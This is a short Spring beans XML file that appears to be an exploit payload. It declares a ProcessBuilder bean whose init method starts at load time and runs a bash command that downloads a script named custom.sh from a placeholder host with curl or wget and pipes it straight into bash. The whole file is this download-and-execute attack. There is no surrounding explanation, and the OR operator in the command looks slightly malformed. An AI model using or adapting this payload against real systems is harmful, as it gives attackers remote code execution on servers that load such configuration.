<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-c</value>
           <value><![CDATA[(curl -s xxx/custom.sh| |wget -q -O- xxx/custom.sh) | bash ]]>
        </value>
      </list>
    </constructor-arg>
  </bean>
</beans>